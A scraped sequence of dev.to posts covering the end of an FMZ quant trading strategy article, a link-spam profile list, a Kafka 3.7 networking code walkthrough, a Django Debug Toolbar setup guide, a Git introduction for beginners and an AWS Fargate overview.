c->add(chartIdx, point); // call the chart object member function "add" to insert data into the chart object (new k line bar)
c->reset(1000); // only keep 1000 bar data
} else {
c->add(chartIdx, point, -1); // Otherwise update (not new bar), this point (update this bar).
}
}
```
Insert a new K-line Bar data into the chart by calling the add member function of the chart object _c.
```
c->add(chartIdx, point);
```
## Backtest


This strategy is only for learning and communication purposes. When apply it in the real market, please modify and optimize acording to the actual situation of the market.
Strategy address: https://www.fmz.com/strategy/163447
More interesting strategies are in the FMZ Quant platform": https://www.fmz.com
From: https://blog.mathquant.com/2019/08/29/c-version-of-okex-futures-contract-hedging-strategy-that-takes-you-through-hardcore-quantitative-strategy.html | fmzquant |
1,879,862 | Mandala Cham Bay Mui Ne | http://molbiol.ru/forums/index.php?showuser=1354461 https://pastelink.net/04204oog https://answerpail... | 0 | 2024-06-07T03:22:44 | https://dev.to/mandalamuine/mandala-cham-bay-mui-ne-796 | http://molbiol.ru/forums/index.php?showuser=1354461
https://pastelink.net/04204oog
https://answerpail.com/index.php/user/mandalamuine
https://telegra.ph/mandalamuine-06-07-2
https://app.roll20.net/users/13420797/mandala
https://www.chordie.com/forum/profile.php?id=1972650
https://www.spoiledmaltese.com/members/mandalamuine.170405/#about
https://readthedocs.org/projects/httpsmandalachambaymuinecom/
https://jsfiddle.net/user/mandalamuine/
https://linktr.ee/tumandalamuine
https://vocal.media/authors/mandala-cham-bay-mui-ne
https://participa.gencat.cat/profiles/mandalamuine/timeline?locale=en
https://www.beatstars.com/mandalachambaymuineofficial/about
https://allmylinks.com/mandalamuine
http://forum.yealink.com/forum/member.php?action=profile&uid=345622
https://www.hahalolo.com/@6662725d0694371ea491bae3
https://fileforum.com/profile/mandalamuine
https://tupalo.com/en/users/6829959
https://8tracks.com/mandalamuine
https://filesharingtalk.com | mandalamuine | |
1,879,861 | ZhongAn Insurance's Wang Kai Analyzes Kafka Network Communication | Author: Kai Wang, Java Development Expert at ZhongAn Online Insurance Basic Platform ... | 0 | 2024-06-07T03:22:11 | https://dev.to/automq/zhongan-insurances-wang-kai-analyzes-kafka-network-communication-1p6i | kafka, javascript | Author: Kai Wang, Java Development Expert at ZhongAn Online Insurance Basic Platform
## Introduction
Today, we explore the core workflow of network communication in Kafka, specifically focusing on Apache Kafka 3.7[2]. This discussion also includes insights into the increasingly popular AutoMQ, highlighting its network communication optimizations and enhancements derived from Kafka.
## I. How to Construct a Basic Request and Handle Responses
As a message queue, network communication essentially involves two key aspects:
- Communication between message producers and the message queue server (in Kafka, this involves producers "pushing" messages to the queue)
- Communication between message consumers and the message queue server (in Kafka, this involves consumers "pulling" messages from the queue)

This diagram primarily illustrates the process from message dispatch to response reception.
Client:
1. KafkaProducer initializes the Sender thread
2. The Sender thread retrieves batched data from the RecordAccumulator (for detailed client-side sending, see [https://mp.weixin.qq.com/s/J2_O1l81duknfdFvHuBWxw])
3. The Sender thread employs the NetworkClient to check the connection status and initiates a connection if necessary
4. The Sender thread invokes the NetworkClient's doSend method to transmit data to the KafkaChannel
5. The Sender thread utilizes the NetworkLink's poll method for actual data transmission
Server:
1. KafkaServer initializes SocketServer, dataPlaneRequestProcessor (KafkaApis), and dataPlaneRequestHandlerPool
2. SocketServer sets up the RequestChannel and dataPlaneAcceptor
3. The dataPlaneAcceptor takes charge of acquiring connections and delegating tasks to the appropriate Processor
4. The Processor thread pulls tasks from the newConnections queue for processing
Processor threads handle prepared IO events
- `configureNewConnections()`: Establish new connections
- `processNewResponses()`: Dispatch Response and enqueue it in the inflightResponses temporary queue
- `poll()`: Execute NIO polling to retrieve ready I/O operations on the respective SocketChannel
- `processCompletedReceives()`: Enqueue received Requests in the RequestChannel queue
- `processCompletedSends()`: Implement callback logic for Responses in the temporary Response queue
- `processDisconnected()`: Handle connections that have been disconnected due to send failures
- `closeExcessConnections()`: Terminate connections that surpass quota limits
6. The KafkaRequestHandler retrieves the ready events from the RequestChannel and assigns them to the appropriate KafkaApi for processing.
7. After processing by the KafkaApi, the response is returned to the RequestChannel.
8. The Processor thread then delivers the response to the client.
This completes a full cycle of message transmission in Kafka, encompassing both client and server processing steps.
##Ⅱ.Kafka Network Communication
**1. Server-side Communication Thread Model**
Unlike RocketMQ, which relies on Netty for efficient network communication, Kafka uses Java NIO to implement a master-slave Reactor pattern for network communication (for further information, see [https://jenkov.com/tutorials/java-nio/overview.html]).

Both DataPlanAcceptor and ControlPlanAcceptor are subclasses of Acceptor, a thread class that executes the Runnable interface. The primary function of an Acceptor is to listen for and receive requests between Clients and Brokers, as well as to set up transmission channels (SocketChannel). It employs a polling mechanism to delegate these to a Processor for processing. Additionally, a RequestChannel (ArrayBlockingQueue) is utilized to facilitate connections between Processors and Handlers. The MainReactor (Acceptor) solely manages the OP_ACCEPT event; once detected, it forwards the SocketChannel to the SubReactor (Processor). Each Processor operates with its own Selector, and the SubReactor listens to and processes other events, ultimately directing the actual requests to the KafkaRequestHandlerPool.
**2. Initialization of the main components in the thread model**

The diagram illustrates that during the broker startup, the KafkaServer's startup method is invoked (assuming it operates in zookeeper mode)
The startup method primarily establishes:
1. KafkaApis handlers: creating dataPlaneRequestProcessor and controlPlaneRequestByProcessor
2. KafkaRequestHandlerPool: forming dataPlaneRequestHandlerPool and controlPlaneRequestHandlerPool
3. Initialization of socketServer
4. Establishment of controlPlaneAcceptorAndProcessor and dataPlaneAcceptorAndProcessor
Additionally, an important step not depicted in the diagram but included in the startup method is the thread startup: enableRequestProcessing is executed via the initialized socketServer.
**3.Addition and Removal of Processor**
1.Addition
- Processor is added when the broker starts
- Actively adjust the number of num.network.threads processing threads
2.Startup
- Processor starts when the broker launches the acceptor
- Actively start the new processing threads that were not started during the adjustment
3.Remove from the queue and destroy
- broker shutdown
- Actively adjusting the num.network.threads to eliminate excess threads and close them

**4. KafkaRequestHandlePool and KafkaRequestHandler**
**1.KafkaRequestHandlerPool**
The primary location for processing Kafka requests, this is a request handling thread pool tasked with creating, maintaining, managing, and dismantling its associated request handling threads.
**2.KafkaRequestHandler**
The actual class for business request handling threads, where each request handling thread instance is tasked with retrieving request objects from the SocketServer's RequestChannel queue and processing them.
Below is the method body processed by KafkaRequestHandler:
```
def run(): Unit = {
threadRequestChannel.set(requestChannel)
while (!stopped) {
// We use a single meter for aggregate idle percentage for the thread pool.
// Since meter is calculated as total_recorded_value / time_window and
// time_window is independent of the number of threads, each recorded idle
// time should be discounted by # threads.
val startSelectTime = time.nanoseconds
// 从请求队列中获取下一个待处理的请求
val req = requestChannel.receiveRequest(300)
val endTime = time.nanoseconds
val idleTime = endTime - startSelectTime
aggregateIdleMeter.mark(idleTime / totalHandlerThreads.get)
req match {
case RequestChannel.ShutdownRequest =>
debug(s"Kafka request handler $id on broker $brokerId received shut down command")
completeShutdown()
return
case callback: RequestChannel.CallbackRequest =>
val originalRequest = callback.originalRequest
try {
// If we've already executed a callback for this request, reset the times and subtract the callback time from the
// new dequeue time. This will allow calculation of multiple callback times.
// Otherwise, set dequeue time to now.
if (originalRequest.callbackRequestDequeueTimeNanos.isDefined) {
val prevCallbacksTimeNanos = originalRequest.callbackRequestCompleteTimeNanos.getOrElse(0L) - originalRequest.callbackRequestDequeueTimeNanos.getOrElse(0L)
originalRequest.callbackRequestCompleteTimeNanos = None
originalRequest.callbackRequestDequeueTimeNanos = Some(time.nanoseconds() - prevCallbacksTimeNanos)
} else {
originalRequest.callbackRequestDequeueTimeNanos = Some(time.nanoseconds())
}
threadCurrentRequest.set(originalRequest)
callback.fun(requestLocal)
} catch {
case e: FatalExitError =>
completeShutdown()
Exit.exit(e.statusCode)
case e: Throwable => error("Exception when handling request", e)
} finally {
// When handling requests, we try to complete actions after, so we should try to do so here as well.
apis.tryCompleteActions()
if (originalRequest.callbackRequestCompleteTimeNanos.isEmpty)
originalRequest.callbackRequestCompleteTimeNanos = Some(time.nanoseconds())
threadCurrentRequest.remove()
}
// 普通情况由KafkaApis.handle方法执行相应处理逻辑
case request: RequestChannel.Request =>
try {
request.requestDequeueTimeNanos = endTime
trace(s"Kafka request handler $id on broker $brokerId handling request $request")
threadCurrentRequest.set(request)
apis.handle(request, requestLocal)
} catch {
case e: FatalExitError =>
completeShutdown()
Exit.exit(e.statusCode)
case e: Throwable => error("Exception when handling request", e)
} finally {
threadCurrentRequest.remove()
request.releaseBuffer()
}
case RequestChannel.WakeupRequest =>
// We should handle this in receiveRequest by polling callbackQueue.
warn("Received a wakeup request outside of typical usage.")
case null => // continue
}
}
completeShutdown()
}
```
Here, line 56 will reassign the task to KafkaApis's handle for processing.
## Ⅲ.unified request handling dispatch
The primary business processing class in Kafka is actually KafkaApis, which serves as the core of all communication and thread handling efforts.
```
override def handle(request: RequestChannel.Request, requestLocal: RequestLocal): Unit = {
def handleError(e: Throwable): Unit = {
error(s"Unexpected error handling request ${request.requestDesc(true)} " +
s"with context ${request.context}", e)
requestHelper.handleError(request, e)
}
try {
trace(s"Handling request:${request.requestDesc(true)} from connection ${request.context.connectionId};" +
s"securityProtocol:${request.context.securityProtocol},principal:${request.context.principal}")
if (!apiVersionManager.isApiEnabled(request.header.apiKey, request.header.apiVersion)) {
// The socket server will reject APIs which are not exposed in this scope and close the connection
// before handing them to the request handler, so this path should not be exercised in practice
throw new IllegalStateException(s"API ${request.header.apiKey} with version ${request.header.apiVersion} is not enabled")
}
request.header.apiKey match {
case ApiKeys.PRODUCE => handleProduceRequest(request, requestLocal)
case ApiKeys.FETCH => handleFetchRequest(request)
case ApiKeys.LIST_OFFSETS => handleListOffsetRequest(request)
case ApiKeys.METADATA => handleTopicMetadataRequest(request)
case ApiKeys.LEADER_AND_ISR => handleLeaderAndIsrRequest(request)
case ApiKeys.STOP_REPLICA => handleStopReplicaRequest(request)
case ApiKeys.UPDATE_METADATA => handleUpdateMetadataRequest(request, requestLocal)
case ApiKeys.CONTROLLED_SHUTDOWN => handleControlledShutdownRequest(request)
case ApiKeys.OFFSET_COMMIT => handleOffsetCommitRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.OFFSET_FETCH => handleOffsetFetchRequest(request).exceptionally(handleError)
case ApiKeys.FIND_COORDINATOR => handleFindCoordinatorRequest(request)
case ApiKeys.JOIN_GROUP => handleJoinGroupRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.HEARTBEAT => handleHeartbeatRequest(request).exceptionally(handleError)
case ApiKeys.LEAVE_GROUP => handleLeaveGroupRequest(request).exceptionally(handleError)
case ApiKeys.SYNC_GROUP => handleSyncGroupRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_GROUPS => handleDescribeGroupsRequest(request).exceptionally(handleError)
case ApiKeys.LIST_GROUPS => handleListGroupsRequest(request).exceptionally(handleError)
case ApiKeys.SASL_HANDSHAKE => handleSaslHandshakeRequest(request)
case ApiKeys.API_VERSIONS => handleApiVersionsRequest(request)
case ApiKeys.CREATE_TOPICS => maybeForwardToController(request, handleCreateTopicsRequest)
case ApiKeys.DELETE_TOPICS => maybeForwardToController(request, handleDeleteTopicsRequest)
case ApiKeys.DELETE_RECORDS => handleDeleteRecordsRequest(request)
case ApiKeys.INIT_PRODUCER_ID => handleInitProducerIdRequest(request, requestLocal)
case ApiKeys.OFFSET_FOR_LEADER_EPOCH => handleOffsetForLeaderEpochRequest(request)
case ApiKeys.ADD_PARTITIONS_TO_TXN => handleAddPartitionsToTxnRequest(request, requestLocal)
case ApiKeys.ADD_OFFSETS_TO_TXN => handleAddOffsetsToTxnRequest(request, requestLocal)
case ApiKeys.END_TXN => handleEndTxnRequest(request, requestLocal)
case ApiKeys.WRITE_TXN_MARKERS => handleWriteTxnMarkersRequest(request, requestLocal)
case ApiKeys.TXN_OFFSET_COMMIT => handleTxnOffsetCommitRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_ACLS => handleDescribeAcls(request)
case ApiKeys.CREATE_ACLS => maybeForwardToController(request, handleCreateAcls)
case ApiKeys.DELETE_ACLS => maybeForwardToController(request, handleDeleteAcls)
case ApiKeys.ALTER_CONFIGS => handleAlterConfigsRequest(request)
case ApiKeys.DESCRIBE_CONFIGS => handleDescribeConfigsRequest(request)
case ApiKeys.ALTER_REPLICA_LOG_DIRS => handleAlterReplicaLogDirsRequest(request)
case ApiKeys.DESCRIBE_LOG_DIRS => handleDescribeLogDirsRequest(request)
case ApiKeys.SASL_AUTHENTICATE => handleSaslAuthenticateRequest(request)
case ApiKeys.CREATE_PARTITIONS => maybeForwardToController(request, handleCreatePartitionsRequest)
// Create, renew and expire DelegationTokens must first validate that the connection
// itself is not authenticated with a delegation token before maybeForwardToController.
case ApiKeys.CREATE_DELEGATION_TOKEN => handleCreateTokenRequest(request)
case ApiKeys.RENEW_DELEGATION_TOKEN => handleRenewTokenRequest(request)
case ApiKeys.EXPIRE_DELEGATION_TOKEN => handleExpireTokenRequest(request)
case ApiKeys.DESCRIBE_DELEGATION_TOKEN => handleDescribeTokensRequest(request)
case ApiKeys.DELETE_GROUPS => handleDeleteGroupsRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.ELECT_LEADERS => maybeForwardToController(request, handleElectLeaders)
case ApiKeys.INCREMENTAL_ALTER_CONFIGS => handleIncrementalAlterConfigsRequest(request)
case ApiKeys.ALTER_PARTITION_REASSIGNMENTS => maybeForwardToController(request, handleAlterPartitionReassignmentsRequest)
case ApiKeys.LIST_PARTITION_REASSIGNMENTS => maybeForwardToController(request, handleListPartitionReassignmentsRequest)
case ApiKeys.OFFSET_DELETE => handleOffsetDeleteRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_CLIENT_QUOTAS => handleDescribeClientQuotasRequest(request)
case ApiKeys.ALTER_CLIENT_QUOTAS => maybeForwardToController(request, handleAlterClientQuotasRequest)
case ApiKeys.DESCRIBE_USER_SCRAM_CREDENTIALS => handleDescribeUserScramCredentialsRequest(request)
case ApiKeys.ALTER_USER_SCRAM_CREDENTIALS => maybeForwardToController(request, handleAlterUserScramCredentialsRequest)
case ApiKeys.ALTER_PARTITION => handleAlterPartitionRequest(request)
case ApiKeys.UPDATE_FEATURES => maybeForwardToController(request, handleUpdateFeatures)
case ApiKeys.ENVELOPE => handleEnvelope(request, requestLocal)
case ApiKeys.DESCRIBE_CLUSTER => handleDescribeCluster(request)
case ApiKeys.DESCRIBE_PRODUCERS => handleDescribeProducersRequest(request)
case ApiKeys.UNREGISTER_BROKER => forwardToControllerOrFail(request)
case ApiKeys.DESCRIBE_TRANSACTIONS => handleDescribeTransactionsRequest(request)
case ApiKeys.LIST_TRANSACTIONS => handleListTransactionsRequest(request)
case ApiKeys.ALLOCATE_PRODUCER_IDS => handleAllocateProducerIdsRequest(request)
case ApiKeys.DESCRIBE_QUORUM => forwardToControllerOrFail(request)
case ApiKeys.CONSUMER_GROUP_HEARTBEAT => handleConsumerGroupHeartbeat(request).exceptionally(handleError)
case ApiKeys.CONSUMER_GROUP_DESCRIBE => handleConsumerGroupDescribe(request).exceptionally(handleError)
case ApiKeys.GET_TELEMETRY_SUBSCRIPTIONS => handleGetTelemetrySubscriptionsRequest(request)
case ApiKeys.PUSH_TELEMETRY => handlePushTelemetryRequest(request)
case ApiKeys.LIST_CLIENT_METRICS_RESOURCES => handleListClientMetricsResources(request)
case _ => throw new IllegalStateException(s"No handler for request api key ${request.header.apiKey}")
}
} catch {
case e: FatalExitError => throw e
case e: Throwable => handleError(e)
} finally {
// try to complete delayed action. In order to avoid conflicting locking, the actions to complete delayed requests
// are kept in a queue. We add the logic to check the ReplicaManager queue at the end of KafkaApis.handle() and the
// expiration thread for certain delayed operations (e.g. DelayedJoin)
// Delayed fetches are also completed by ReplicaFetcherThread.
replicaManager.tryCompleteActions()
// The local completion time may be set while processing the request. Only record it if it's unset.
if (request.apiLocalCompleteTimeNanos < 0)
request.apiLocalCompleteTimeNanos = time.nanoseconds
}
}
```
From the code discussed, key components are identifiable, such as the ReplicaManager, which manages replicas, the GroupCoordinator, which oversees consumer groups, the KafkaController, which operates the Controller components, and the most frequently used operations, KafkaProducer.send (to send messages) and KafkaConsumer.consume (to consume messages).
## IV. AutoMQ Thread Model
**1. Optimization of Processing Threads**
AutoMQ, drawing inspiration from the CPU pipeline, refines Kafka's processing model into a pipeline mode, striking a balance between sequentiality and efficiency.
- Sequentiality: Each TCP connection is tied to a single thread, with one network thread dedicated to request parsing and one RequestHandler thread responsible for processing the business logic;
- Efficiency: The stages are pipelined, allowing a network thread to parse MSG2 immediately after finishing MSG1, without waiting for MSG1’s persistence. Similarly, once the RequestHandler completes verification and sequencing of MSG1, it can start processing MSG2 right away. To further improve persistence efficiency, AutoMQ groups data into batches for disk storage.
**2. Optimization of the RequestChannel**
AutoMQ has redesigned the RequestChannel into a multi-queue architecture, allowing requests from the same connection to be consistently directed to the same queue and handled by a specific KafkaRequestHandler, thus ensuring orderly processing during the verification and sequencing stages.
Each queue is directly linked to a particular KafkaRequestHandler, maintaining a one-to-one relationship.
After the Processor decodes the request, it assigns it to a specific queue based on the hash(channelId) % N formula.
## References
[1] AutoMQ: https://github.com/AutoMQ/automq
[2] Kafka 3.7: https://github.com/apache/kafka/releases/tag/3.7.0
[3] JAVANIO: https://jenkov.com/tutorials/java-nio/overview.html
[4] AutoMQ Thread Optimization: [https://mp.weixin.qq.com/s/kDZJgUnMoc5K8jTuV08OJw] | automq |
1,879,820 | Django Debug Toolbar Setup | What is Django Debug Toolbar? The Django Debug Toolbar is a configurable set of panels... | 0 | 2024-06-07T03:15:36 | https://dev.to/hasancse/django-debug-toolbar-setup-1f3j | django, python, webdev, programming | ## **What is Django Debug Toolbar?**
The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/response and, when clicked, display more details about the panel’s content.
## **How to install and implement Django Debug Toolbar?**
For the installation of the Django Debug Toolbar, you need to have a Django project where you can use pip in a Virtual Environment or without them. If you don’t want to use pip, you can get the code of this component from here (https://github.com/jazzband/django-debug-toolbar) and put it in your Django project path; but the pip installation is easier and I will focus on that.
For installation I recommend using the virtual env and executing this command:
```
$ pip install django-debug-toolbar
```
The configuration of this component is simple, you just need to change your project’s urls.py and settings.py to use the toolbar.
In your project’s urls.py, enter this code:
```
from django.conf import settings
from django.urls import include, path # For django versions from 2.0 and up
import debug_toolbar
urlpatterns = [
#...
path('__debug__/', include(debug_toolbar.urls)),
#...
]
```
_Take care of the imports because it is possible that you may duplicate some of this.
Now In your project’s settings.py, make sure that debug mode is true.
```
DEBUG = True
```
Add debug_toolbar and make sure django.contrib.staticfiles exists in INSTALLED_APPS.
```
INSTALLED_APPS = [
#...
'django.contrib.staticfiles',
#...
'debug_toolbar',
#...
]
```
Add this line to MIDDLEWARE
```
MIDDLEWARE = [
#...
'debug_toolbar.middleware.DebugToolbarMiddleware',
#...
]
```
Add INTERNAL_IPS in settings.py; The INTERNAL_IPS conf is valid for a local development environment, if your dev environment is different, you just change this field with your valid configuration.
```
INTERNAL_IPS = ('127.0.0.1', '0.0.0.0', 'localhost',)
```
Add DEBUG_TOOLBAR_PANELS in settings.py
```
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
```
**You did it!**
This is the default configuration and if you want to see more options, you can see this page:
https://django-debug-toolbar.readthedocs.io/en/stable/configuration.html
Note: It is very important that you have the close body tag ( ) in your base template for the Django Debug Toolbar is showing.
This component has a variety of panels that can be added through the configuration. These panels show different information related to HTTP requests/responses and other relevant debug data. In this URL, you can see all different default panels and you can learn how to use and configure it. http://django-debug-toolbar.readthedocs.io/en/stable/panels.html | hasancse |
1,879,819 | Git for Beginners, the Introduction... | If you are starting in the world of programming, you have surely heard of Git, but you might not... | 27,814 | 2024-06-07T03:11:36 | https://dev.to/andresordazrs/git-for-beginners-the-introduction-2g9e | git, beginners, developer | If you are starting in the world of programming, you have surely heard of Git, but you might not fully understand what it is or why it is so important. Don’t worry, we've all been there.
Learning Git can seem challenging at first, but I promise that by the end of this article, you will understand why it is an essential tool for any programmer and how it can make your life much easier.
Let's discover together the fascinating world of Git and why mastering it will give you a significant advantage in your career as a developer.
**What is Git?**
So, what is Git? In simple terms, Git is a version control system. But what does that really mean? Imagine you are writing a book. Every day you make changes: adding chapters, correcting errors, improving the content. Wouldn't it be great to have a way to save each version of the book so that if you make a mistake, you can revert to a previous version without losing all your work? That is exactly what Git does, but instead of a book, you do it with your code.
To make it even clearer, think of Google Drive or Dropbox. When you upload a file and then modify it, these services save the previous versions of the file. So, if you accidentally delete something important, you can recover the previous version. Git does this and much more, allowing you not only to save versions of your code but also to collaborate efficiently with others.
**Why is Git Important?**
Now that you have a basic idea of what Git is, let's talk about why it is so important. Firstly, Git allows you to keep a detailed record of all changes to your code. This is crucial because as your project grows, it can be difficult to remember what changes you made and when.
Another key reason is collaboration. If you are working on a project with other people, Git allows you to combine everyone’s work in an organized manner. Imagine you and your friends are writing an essay together. Each one writes a section, but in the end, someone has to put all the parts together. With Git, this process is automatic and avoids conflicts.
Additionally, Git is used in real, large projects. Companies like Google, Facebook, and Microsoft use Git to manage their code. This means that by learning Git, you are acquiring a skill that is valued in the job market.
**Initial Difficulties with Git**
It is true that Git can be intimidating at first. Here are some key concepts that are usually confusing for beginners:
**- Repositories (Repos):** Think of a repository as a folder for your project, where all versions of your code are stored.
**- Commits:** A commit is like taking a snapshot of your project at a specific moment. Each time you make a commit, you are saving a new version of your project.
**- Branches:** Branches allow you to work on different parts of your project simultaneously without interfering with the main code. Imagine you are building a house and can work on several rooms at once without the work in one affecting the other.
To help you overcome these difficulties, there are many tools and resources available. For example, GitHub has an excellent guide for beginners, and there are many tutorials and online courses that can help you better understand how Git works.
**Git and the Importance of Learning It**
Learning Git is not just an option; it is a necessity. Here are some reasons why it is fundamental:
**- Problem Solving:** With Git, you can track errors to their source. If something stops working, you can review previous commits to find when and where the problem was introduced.
**- Safe Experimentation:** You can create branches to try new ideas without fear of messing up your main code. If the new idea doesn’t work, you can simply discard the branch.
**- Detailed History:** Each commit includes a message that describes what you changed and why. This is incredibly useful for remembering why you made certain changes and for helping others understand your work.
**Platforms and Tools Related to Git**
Now that you know what Git is and why it is important, let’s look at some platforms and tools that make using Git even easier:
**- GitHub:** The most popular platform for hosting Git repositories. It offers tools for code review, project management, and collaboration with other developers.
**- GitLab:** Similar to GitHub but with more emphasis on continuous integration and continuous delivery (CI/CD). It is ideal for teams that want to automate their workflow.
**- Bitbucket:** Another alternative, especially popular among teams already using other Atlassian tools like Jira. Bitbucket integrates perfectly with these tools.
**Git in the Workplace**
In the workplace, Git is an essential and highly valued skill for developers. Companies seek professionals who know how to use Git because it greatly facilitates team collaboration, allowing several developers to work simultaneously on the same project without conflicts or information loss.
Git helps manage large and complex projects efficiently, which is crucial for software development at an enterprise scale. Additionally, using Git shows that you understand and apply best practices in software development, enhancing your professionalism and attractiveness to employers. In summary, mastering Git not only improves your technical ability but also prepares you to effectively integrate into work teams in a professional environment.
In conclusion, Git is a powerful tool that every programmer should learn. It not only helps you manage your code efficiently but also prepares you to work in teams and on large projects. Although it can be a bit difficult at first, with practice and patience, you will realize that it is an invaluable skill. So, don’t get discouraged and keep practicing.
Happy coding! | andresordazrs |
1,879,817 | Running Containers at Scale: A Deep Dive into AWS Fargate | Running Containers at Scale: A Deep Dive into AWS Fargate Introduction In... | 0 | 2024-06-07T03:07:37 | https://dev.to/virajlakshitha/running-containers-at-scale-a-deep-dive-into-aws-fargate-4mb0 | # Running Containers at Scale: A Deep Dive into AWS Fargate
### Introduction
In today's rapidly evolving technological landscape, containerization has emerged as a cornerstone of modern application development and deployment. Containers offer a lightweight and portable solution for packaging applications with their dependencies, ensuring consistency across different environments. As organizations increasingly embrace containerized workloads, the need for a scalable and managed container orchestration service becomes paramount. This is where AWS Fargate comes into play, offering a serverless compute engine for containers that abstracts away the complexities of cluster management and infrastructure provisioning.
### Understanding AWS Fargate
AWS Fargate is a serverless compute engine for containers that allows you to run containers without having to manage servers or clusters. With Fargate, you no longer need to provision, configure, or scale clusters of virtual machines to run your containers. Instead, you can focus solely on building and deploying your applications, while Fargate handles all the underlying infrastructure management.
### Key Concepts
- **Tasks:** A task is the fundamental unit of execution in Fargate. It represents a single running container or a group of containers defined in a task definition.
- **Task Definitions:** A task definition serves as a blueprint that specifies the container image, resource requirements (CPU, memory), networking configuration, and other parameters for your tasks.
- **Clusters:** While Fargate eliminates the need for you to manage clusters directly, you still need to associate your tasks with a cluster for organizational purposes and to leverage other AWS services like load balancing and service discovery.
- **Execution Roles:** Execution roles grant permissions to your tasks to interact with other AWS services, such as accessing data in Amazon S3 or publishing logs to Amazon CloudWatch.
- **Networking Modes:** Fargate supports multiple networking modes, including `awsvpc` for running tasks in your own VPC and `host` for sharing the host's networking namespace (suitable for specific use cases).
### Use Cases for AWS Fargate
Here are five prominent use cases where AWS Fargate excels:
#### 1. Microservices Architecture
Microservices architecture, which involves breaking down applications into small, independent services, aligns perfectly with Fargate's serverless nature. Each microservice can be deployed as a separate Fargate task, enabling independent scaling and fault isolation.
**Technical Implementation:**
- Define individual task definitions for each microservice, specifying the required resources and dependencies.
- Utilize AWS App Mesh or other service mesh solutions to manage communication and discovery between microservices.
- Implement auto-scaling policies based on metrics like request rate or resource utilization to ensure optimal performance and cost-efficiency.
#### 2. Batch Processing
For batch processing workloads that involve running tasks for a finite duration, Fargate provides a cost-effective solution. You can trigger Fargate tasks in response to events like file uploads or schedule them to run at specific intervals.
**Technical Implementation:**
- Create a task definition for your batch processing job, ensuring it includes all necessary libraries and dependencies.
- Use AWS Batch, a fully managed batch processing service, to submit and manage your Fargate tasks at scale.
- Leverage AWS Step Functions to orchestrate complex batch workflows involving multiple tasks and dependencies.
#### 3. Machine Learning Inference
Deploying machine learning models for inference often requires specialized hardware and scaling capabilities. Fargate allows you to serve predictions from your trained models without managing the underlying infrastructure.
**Technical Implementation:**
- Package your trained machine learning model and dependencies as a Docker image.
- Define a task definition specifying the appropriate resources (CPU, memory, GPU) for your inference workload.
- Use AWS Lambda to trigger Fargate tasks for real-time inference requests or configure a load balancer for continuous availability.
#### 4. Web Applications
Fargate can also power web applications, especially those built with microservices or serverless architectures. By containerizing your web application components and deploying them on Fargate, you benefit from auto-scaling, high availability, and simplified deployment processes.
**Technical Implementation:**
- Containerize your web application components, including the web server, application logic, and database connections.
- Utilize AWS Elastic Load Balancing (ELB) to distribute incoming traffic across multiple Fargate tasks for high availability.
- Employ Amazon RDS or other managed database services for persistent data storage and retrieval.
#### 5. Scheduled Tasks
For tasks that need to run on a recurring schedule, such as nightly backups or data processing jobs, Fargate offers a reliable and serverless solution.
**Technical Implementation:**
- Define a task definition for your scheduled task, including the necessary scripts and configurations.
- Utilize Amazon CloudWatch Events to trigger your Fargate tasks based on cron expressions or other event patterns.
- Monitor task execution logs and metrics in Amazon CloudWatch to ensure successful completion and identify any potential issues.
### Comparing Fargate with Other Solutions
| Feature | AWS Fargate | Azure Container Instances | Google Cloud Run |
|---|---|---|---|
| Serverless | Yes | Yes | Yes |
| Cluster Management | Managed | Managed | Managed |
| Scaling | Auto-scaling based on tasks | Auto-scaling based on containers | Auto-scaling based on requests |
| Networking | VPC integration, multiple networking modes | Virtual Network integration | VPC integration |
| Pricing | Per-second billing based on resource utilization | Per-second billing based on resource utilization | Per-request billing |
### Conclusion
AWS Fargate offers a compelling solution for organizations seeking a serverless and scalable approach to running containers. By eliminating the operational overhead of cluster management, Fargate empowers developers to focus on building and deploying applications with speed and agility. Whether you're modernizing legacy applications or building cloud-native solutions, Fargate's flexibility and integration with other AWS services make it a powerful tool in your container orchestration arsenal.
## Advanced Use Case: Building a Real-Time Data Processing Pipeline with AWS Fargate and AWS Kinesis
As a software architect and AWS solution architect, imagine a scenario where your organization needs to build a real-time data processing pipeline to ingest, analyze, and visualize large volumes of streaming data from various sources, such as social media feeds, sensor data, or financial transactions.
### Architecture Overview
This advanced use case leverages AWS Fargate in conjunction with other AWS services to create a robust and scalable data processing pipeline:
1. **Data Ingestion:** Amazon Kinesis Data Streams acts as the ingestion point, capturing high-velocity data streams from various sources.
2. **Data Processing:** Fargate tasks running Apache Flink or Apache Spark Streaming process the ingested data in real time. Each Fargate task can be dedicated to a specific processing stage (e.g., filtering, transformation, aggregation).
3. **Data Storage:** Processed data is persisted in Amazon S3 for long-term storage and further analysis.
4. **Data Visualization:** Amazon QuickSight or other visualization tools connect to the processed data in S3 to provide real-time dashboards and insights.
### Benefits
- **Scalability and Elasticity:** Kinesis Data Streams and Fargate scale automatically to handle fluctuating data volumes, ensuring consistent performance.
- **Real-time Processing:** Apache Flink and Spark Streaming on Fargate enable real-time data analysis, facilitating timely decision-making.
- **Serverless Simplicity:** By utilizing Fargate, you eliminate the need to manage the underlying infrastructure, reducing operational overhead.
- **Cost-Effectiveness:** You pay only for the resources you consume, optimizing costs for both processing and storage.
### Implementation Details
- **Kinesis Data Streams:** Configure shards based on expected data volume and choose the appropriate data retention period.
- **Fargate Tasks:** Create task definitions for your data processing applications (Flink or Spark Streaming), specifying the required resources and dependencies.
- **Task Scaling:** Implement auto-scaling policies for your Fargate tasks based on Kinesis Data Streams metrics (e.g., incoming records per second).
- **Data Persistence:** Configure your data processing applications to store processed data in Amazon S3 using the appropriate format (e.g., Parquet, Avro).
